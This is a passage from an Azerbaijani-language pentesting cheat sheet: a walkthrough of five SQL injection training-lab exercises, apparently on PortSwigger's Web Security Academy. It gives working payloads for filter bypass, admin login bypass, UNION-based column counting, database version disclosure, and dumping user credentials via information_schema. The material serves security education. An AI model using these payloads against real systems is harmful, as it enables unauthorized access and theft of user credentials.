Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page
  • Nümunə 1.
  • Nümunə 2.
  • Nümunə 3.
  • Nümunə 4.
  • Nümunə 5.

Was this helpful?

  1. Web Pentesting
  2. SQL Injection

Praktiki nümunə

PreviousSQL InjectionNextCross-Site-Scripting (XSS)

Last updated 1 year ago

Was this helpful?

Nümunə 1.

Bizə bu labaratoriya tapşırığında "WHERE" bəndindən istifadə edilərək göstərilən məlumatlarda SQL inyeksiyası olduğu deyilir.

Axtarış yerindən ixtiyari bir kataloga daxil oluruq və avtomatik bizim URL-in deyişdiyini görürük.

Biz artıq sorğunun necə çalışdığını bilirik.

SELECT * FROM products WHERE category = 'Corporate gifts' AND released = 1

Bizə bu sorğu üzərində bəzi dəyişiklər edərək bütün gizli məlumatları tapmaq lazımdır. Corporate gifts yerinə aşağıdakını yazaraq bütün məlumatları çəkə bilərik.

' or 111=111--

Ümumi sorğu bu şəkildə olacaq:

SELECT * FROM products WHERE category = '' or 111=111--' AND released = 1

Bildiyimiz kimi -- komment sətirləri üçün istifadə istifadə olunur. Ondan sonra gələnləri nəzərə almır.

Və lab həll olundu biz indi bütün gizli məlumatlara baxa bilərik.

Nümunə 2.

Bu lab tapşırığında bizə login səhifəsində SQL zəifliyi olduğu deyilir. Və biz bunu tamamlamaq üçün administrator kimi hesaba daxil olmalıyıq. Login hissəsinə keçid edək.

Buradakı SQLi açığı bizə şifrəsiz hesaba daxil olmağımıza imkan verir.

Ad yerinə administrator' -- yazıb şifrə yerinə heçnə yazmayaraq və ya random bir şeylər yazıb admin hesabına daxil ola bilərik. Buradakı əsas məqam -- olan hissədir. Bildiyimiz kimi -- komment sətirləri üçün istifadə istifadə olunur. Ondan sonra gələnləri nəzərə almır. Yəni şifrə hissəsi -- dən sonra gəldiyi üçün artıq heç bir funksiyası qalmır.

Gördüyümüz kimi lab həll olundu və artıq biz administrator hesabındayıq.

Nümunə 3.

Bu lab-da kategoriya bölməsində Union-based SQL injection olduğu deyilir. Və database Oracle-dır.

Bu açıqdan istifadə etmək üçün ilk öncə orada olan sütünların sayını müəyyən etməliyik. Bunun üçün bu sorğuları URL-də yaza bilərik.

' UNION SELECT NULL FROM DUAL--

' UNION SELECT NULL,NULL FROM DUAL--

Oracle database olduğu üçün DUAL ilə birlikdə yazmaq lazımdır. Və yuxarıdakı 2 sorğunu yoxladıqda 2ci nin doğru olduğu məlum olur.

Sonra isə bizdən istənilən Oracle database versiyasını müəyyən etməkdir. Bunu öyrənmək üçün belə bir sorğu yaza bilərik: (Database versiyasının müəyyən edilməsi üçün sorğular hər database-ə görə dəyişə bilər)

' UNION SELECT BANNER,NULL FROM v$version--

Və lab tamamlandığını və database haqda müxtəlif məlumatları həmçinin versiyasını görə bilirik.

Nümunə 4.

Bu lab Nümunə 3 ilə eynidir. Ancaq burada versiyanın müəyyən etmək üçün lazım olan sorğu fərqlidir.

' UNION SELECT NULL,@@version-- -
' UNION SELECT NULL,@@version#

Bunlardan istifadə edilə bilər.

Nümunə 5.

Burada bizə database-in Oracle olmadığı deyilir və biz bununla necə formada sorğular yazacağımızı dəqiqləşdiririk.

Bu açıqdan istifadə etmək üçün kategoriyalar hissəsinə keçməli və sütünların sayını müəyyən etməliyik. Bunun üçün bu sorğuları URL-də yaza bilərik.

'union select null,null--

Sütunların sayını müəyyən etdikdən sonra sıra table adını öyrənməkdədir:

'UNION SELECT table_name,NULL FROM information_schema.tables--

Table adınıda tapdıqdan sonra sıra həmin table-da olan sütunların adlarını tapmaqdadır.

'UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users_aokxya'--

Sütunlarında (columns) adını müəyyən etdik. Artıq dataları ələ keçirə bilərik.

' UNION SELECT username_razaer, password_nkkztb FROM users_aokxya--

Və budur. Sistemdə olan istifadəçilər və onların şifrələri. Biz artıq administrator hesabına keçid edə bilərik.

https://0a5e002603d66b718283ca2e005d00ac.web-security-academy.net/filter?category=Corporate+gifts